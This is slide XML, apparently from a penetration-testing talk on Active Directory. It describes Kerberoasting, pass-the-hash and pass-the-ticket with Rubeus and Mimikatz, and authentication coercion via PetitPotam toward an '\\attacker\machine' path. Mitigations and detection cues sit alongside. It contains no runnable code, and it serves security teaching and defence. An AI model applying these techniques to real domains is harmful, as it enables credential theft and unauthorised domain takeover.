    <dgm:cxn modelId="{E80B2AE9-616F-4697-BA9B-DC86A4B30371}" type="presParOf" srcId="{0A4A8419-6C05-4D47-B4EC-ABBD6FE6B7EE}" destId="{8088B5EB-EAE9-4C21-86CE-0FAA1A97B7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904E0-C840-40DD-9C13-CC99CFEC0832}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2418170" y="773350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Vendor Forest</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2432694" y="787874"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12070763-096B-480C-BC1D-D3C3940E7095}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1339598" y="1269246"/>
          <a:ext cx="1450493" cy="198358"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1450493" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1450493" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="198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5D224-5BFB-4EFD-89E5-C81F05C16168}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="967677" y="1467604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Vendor Domain A</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="982201" y="1482128"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2A63189-D2C1-427E-81B0-516F8DCD5186}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="372602" y="1963499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966995" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="198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4965D-7591-49E1-9FBC-22137F31070D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="681" y="2161857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Users</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="15205" y="2176381"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EC2439A-98B1-4E55-82DF-A5B146C795CA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1293878" y="1963499"/>
          <a:ext cx="91440" cy="198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00F42-331A-4D26-ADE5-1A3CFCF57DAA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="967677" y="2161857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Computers</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="982201" y="2176381"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EBFD7AFF-86BD-4635-ABAE-B3C416549986}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1339598" y="1963499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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="198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5902A-F1F3-4996-A8CC-EBA43E41E4C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1934673" y="2161857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Group Policies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1949197" y="2176381"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E587D9DA-AA38-4331-B065-7E48925822F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2790092" y="1269246"/>
          <a:ext cx="1450493" cy="198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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1450493" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1450493" y="198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D751A-5E55-4DAC-9703-60F797FA12E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3868664" y="1467604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Vendor Domain B</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3883188" y="1482128"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DD4DD9C6-4286-4880-B04F-8E722ADE0464}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3273590" y="1963499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966995" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="198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88BF5-0D1D-4290-A0F8-022A7497C29A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2901668" y="2161857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Computers</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2916192" y="2176381"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B7E70F3A-3294-4F74-9311-A5DEB165A591}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4194866" y="1963499"/>
          <a:ext cx="91440" cy="198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1D677-DB3B-4FFE-8DE5-72D006486C57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3868664" y="2161857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Users</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3883188" y="2176381"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99D194A7-99DA-49C5-A486-BDFB7BB00D28}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4240586" y="1963499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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="198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99A23-4386-4222-AD29-1501CCA6FE77}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4835660" y="2161857"/>
          <a:ext cx="743843" cy="49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Group Policies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4850184" y="2176381"/>
        <a:ext cx="714795" cy="466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13C6-BAA6-4F14-A64B-590DF6E0DEA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2418170" y="907317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Corp Forest</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2432694" y="921841"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{42C2455E-969F-4073-9BDE-1FC8C20F2D4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1339598" y="1403213"/>
          <a:ext cx="1450493" cy="198358"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1450493" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1450493" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="19835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BA7FD-EBBD-4005-BBCB-D19B4D0D812B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="967677" y="1601571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Corp Domain A</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="982201" y="1616095"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F584CCEC-AD0A-4A8C-9DEF-7D52E53E58A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="372602" y="2097466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966995" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1983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40748-11C5-4993-980E-0D83A9775A6A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="681" y="2295824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Users</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="15205" y="2310348"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2D355274-B1E5-4CD1-A839-E0F13243FA7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1293878" y="2097466"/>
          <a:ext cx="91440" cy="198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3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98A97-CA0F-4E8C-A7CF-3CB69DCE4552}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="967677" y="2295824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Computers</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="982201" y="2310348"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{373A1BD5-786B-416A-9D7C-34ED2411EF6A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1339598" y="2097466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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="1983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33F3-E932-4A68-ADC7-0F7D7204B121}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1934673" y="2295824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Group Policies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1949197" y="2310348"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{359C3B7B-33A4-4890-9E1A-A7256BA6ECED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2790092" y="1403213"/>
          <a:ext cx="1450493" cy="198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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1450493" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1450493" y="19835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54EAB-8450-45BC-9466-E36581BDAB55}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3868664" y="1601571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Corp Domain B</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3883188" y="1616095"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{057EF413-2266-4C5F-8694-72484F298462}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3273590" y="2097466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966995" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1983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DC8D1-C315-4BCD-8464-BB93B58FBC1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2901668" y="2295824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Computers</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2916192" y="2310348"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9A9EAE67-0726-4ED2-9CE5-925C68C076BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4194866" y="2097466"/>
          <a:ext cx="91440" cy="198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3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21FE1-7FCA-460C-98B1-F641FB3E3F7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3868664" y="2295824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Users</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3883188" y="2310348"/>
        <a:ext cx="714795" cy="466847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C91DDAE0-EC27-486D-90FA-B68F864A9443}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4240586" y="2097466"/>
          <a:ext cx="966995" cy="198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9"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="99179"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="966995" y="1983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3FFD5-7945-4BDF-BBBD-3EC2489F3534}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4835660" y="2295824"/>
          <a:ext cx="743843" cy="4958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Group Policies</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4850184" y="2310348"/>
        <a:ext cx="714795" cy="46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59:37.0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21,'790'0,"-637"20,945-21,-945-19,290 21,-289 19,885-21,-944-9,3 0,710 11,-655-21,1021 20,-1157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59:53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7830 0,'-68'1,"-96"13,96-8,1-2,-70-7,20 0,56 4,-86 13,61-9,64-4,-1 0,1 1,-24 5,9-1,1-2,-1-1,0-2,-46-4,-7 0,-1853 3,1789-20,29 22,-96-4,159-7,40 5,-1 1,-24 0,-1916 3,1810 20,86-20,25-2,0 3,-78 11,92-8,-1-1,-47-1,50-3,-1 1,1 2,-39 7,42-5,-1-1,1-1,-40-1,39-2,1 1,0 1,-43 9,45-6,-1-1,1-1,-32-1,31-2,0 2,0 1,-26 5,20-3,1 0,-1-2,0-1,-36-4,25 1,-47 4,24 7,41-5,-1-1,-26 1,-203-5,235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59:56.6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39,'57'-17,"33"11,111 7,-66 2,-28-2,117-3,-145-6,-38 2,47 1,1544 7,-865-3,-641 11,5 0,3014-14,-1615 7,-1473-3,-41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CC57D-221B-44AE-84C8-B6258CA8A276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1B17-E748-44E1-9B7B-74604BFC3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7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5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disable RC4 encryption starting Windows Server 2008. Support for AES was introduced in Windows Server 2008 and Windows Vista.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4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Credential guard restricts who can access NT hashes and TGTs. Also prevents writing of Kerberos tickets to memory, even with local admin.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2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Protected Users Group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Server 2012R2 and above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Cannot use Wdigest and CredSSP, reducing local storage of plaintext passwords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more caching of NT hashes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Kerberos uses AES, no more DES or RC4 encryption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Can’t be delegated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TGT renewal limited to 4 hours. Hardcoded life of TGTs.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4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9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0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E1B17-E748-44E1-9B7B-74604BFC3CE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DE13-7073-40C0-B4F4-B30E7027B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9945C-F315-48C7-B5F5-FB2B13DE9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87A4-6410-4411-9BC3-D7EE0A7E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AC2685-9B4A-4EBB-9B3B-82C42C569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9" y="6315961"/>
            <a:ext cx="1337706" cy="4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4F85-7282-4460-AFD5-9EFC243A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77485-225C-4273-9368-405A82FF6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1DBC3A-73AB-43D7-93F8-D3417507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F5FC1-7E72-4F4E-A848-59142EE30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3856C-3016-4EA2-B306-40B9335D2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BD43DD-5958-437D-87C7-41507A93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6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B562-CBFC-4045-8BF0-1C020ECD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EE41-20E1-4F56-A26D-3BF7E1C3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D0C970-127D-4416-ABB0-D5ED4DB7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4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DFC7-439B-4575-9489-1944C6B6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823DD-A30F-4980-93E4-B047309D7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11DA8B-272E-404D-B8A4-04D14D62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B88E-16D4-4B91-AF31-25B53F83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AD4C0-552C-454D-A250-1A322FBD1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C97AB-FB68-4FC4-B3E3-502D157F5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EBC932-B283-4DB6-A17F-492E47DC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FC30-4F07-4EAE-BE86-135F8C70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DBF05-33ED-4D34-BF88-9EAA9E439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C0521-30FC-4C7A-9348-EC700D26D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25D24-CE06-4271-8AD9-93DB255A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1B78-6729-42DF-BE1E-B0F09CAD0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BA7F310-C34C-41D1-B45E-BFBE0BAC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73DA-EAFD-41F3-9B12-0496B1B4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0FC1121-BF88-4B73-A231-3E66BC6E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0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BAB30-D00C-4014-BDDD-C2C83B29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2E40-A394-46F4-9D98-CAFF9623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1BEC-C043-4B02-A450-A5AE09FF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83F34-6CE3-4F4F-9D0D-0B951C1E6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7DC9F2B-1E2F-4C5F-9A00-3EA71BD9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8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27F5-E6CB-488C-A4BA-F9A0C872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5F6C6-2742-4D27-A399-594C73103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2831C-DFC8-45DA-A671-9D59A035C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60504D7-FE90-4B30-8513-5F09E21F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F59EA5-10B9-4BBA-BBE5-74CDE99FE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4F527-FA37-464E-B05E-BD38F18D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477B5-F76B-4AE2-B779-FED7B4A4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C95F-FEFB-4F2F-81DC-9E14A562E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June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06E-9B70-4C32-83E5-21C18714B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B3917-7FC0-4357-AF83-2F9ABB93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hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticke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nome-laptop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category:gartoon_icon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D568D-FFF3-414A-B3F7-740F692B6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7" y="965199"/>
            <a:ext cx="10204981" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Feature or a Vulnerability?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tales of an Active Directory Pentest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834A5-6748-3B5B-F5B3-B4AB2246C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617" y="4474874"/>
            <a:ext cx="9144000" cy="983817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Qasim Ijaz</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Blue Bastion Security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8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7451-6DD2-7935-B116-B589D226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Kerberoasting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85A5-28FD-110B-3518-CF8A18014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Managed Service Accounts (MSA or GMSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows will manage the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No Service principal name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If named service accounts must be used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strong passphrases ( &gt; 32 chars)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit the use of service accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid creating privileged service accounts</a:t>
            </a:r>
          </a:p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Most kerberoasting tools will request RC4 tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deception: Create a fake service account and wait to be kerberoasted!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31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8282"/>
            <a:ext cx="12192000" cy="4946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EB7F9F-6B22-F6CB-26AC-48AF35C4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Lateral Movement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55DF02-5657-2A28-888A-441049EA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Knock cerebrated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" kern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3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53A5-CC1D-406C-8710-26D564EA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Pass The Hash vs Over-Pass the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F3CB-238F-43AB-BB7A-BF6B80C4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PTH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Passes NT hash through NetNTLMv1/NetNTLMv2 protocol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Modern Windows operating systems don’t allow PTH for non-RID500 local users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Patches LSASS directly on target (loud)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OPTH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Creates a valid Kerberos TGT for the user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Don’t need local administrator rights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Will end up in LSASS but in a less noisy way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52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D382-C3A5-B288-61ED-5DFE7BBC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Pass the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7528-6AFC-887E-2915-33CA8340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Unlike pass-the-hash which uses NetNTLM, pass-the-ticket uses Kerberos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Obtain TGT from memory (LSASS)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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requires local admin if you want another user’s TGT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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can be done using Rubeus, Mimikatz, etc.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Inject that ticket into your LSASS or provide it to your tool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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rubeus and Mimikatz can inject back into LSASS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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impacket and CrackMapExec take the ticket with KRB5CCNAME environment variable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FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket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36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F47C-931C-EF84-24CB-12ABC6E3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Lateral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9AFA-6F55-479E-F01A-19587D337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account logging into large number of systems?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Kerberos ticket requested on Host A but used on Host B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Anomalous (e.g., Mimikatz) process interacting with LSASS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Deception: Inject fake credentials into LSASS &amp; monitor their use 😈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Workstation accessing another workstation over SMB/WinRM?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Credential Guard can stop pass-the-hash and over-pass-the-hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94334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8282"/>
            <a:ext cx="12192000" cy="4946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EB7F9F-6B22-F6CB-26AC-48AF35C4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Domain Escalation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55DF02-5657-2A28-888A-441049EA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Who DAt?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4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1183C8-4F1C-EA40-8ED4-52A8F063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Access / Privileges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2D3FC-483F-7B9E-E3FF-F8B1101B9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Users provided WRITE privilege to group policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain users provided local administrator access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Service accounts with high privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Write privileges to network shares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F82D3-A3A6-1612-F730-D2F0B1B70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644" y="4144701"/>
            <a:ext cx="6673190" cy="22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C7A0-3D57-E56B-C277-BAAACE75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Coercion| Ask Nicely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A76B3-B563-DCC7-3B74-A77B05C3D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Often usable by an unauthenticated or low privileged domain user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Coerces the target (e.g., domain controller) to authenticate to an arbitrary machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, \\attacker\machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>MS-RPRN remote call to RpcRemoteFindPrinterChangeNotificationEx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>MS-EFSR call to Encrypting File System Remote (EFSRPC) Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as PetitPotam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>https://github.com/p0dalirius/windows-coerced-authentication-methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The patch restricts this to authenticated accounts only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305805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1D37-6B1D-F3D0-AD25-B70EABA8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SCF, URL, LNK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DB312-A3AF-7EF3-B6B7-21D362476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2" t="3822"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="1953490"/>
            <a:ext cx="6938962" cy="4488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4EB7D-B894-A528-942A-F6F226FA31A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976746" y="2819400"/>
            <a:ext cx="33389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[Shell]</a:t>
            </a:r>
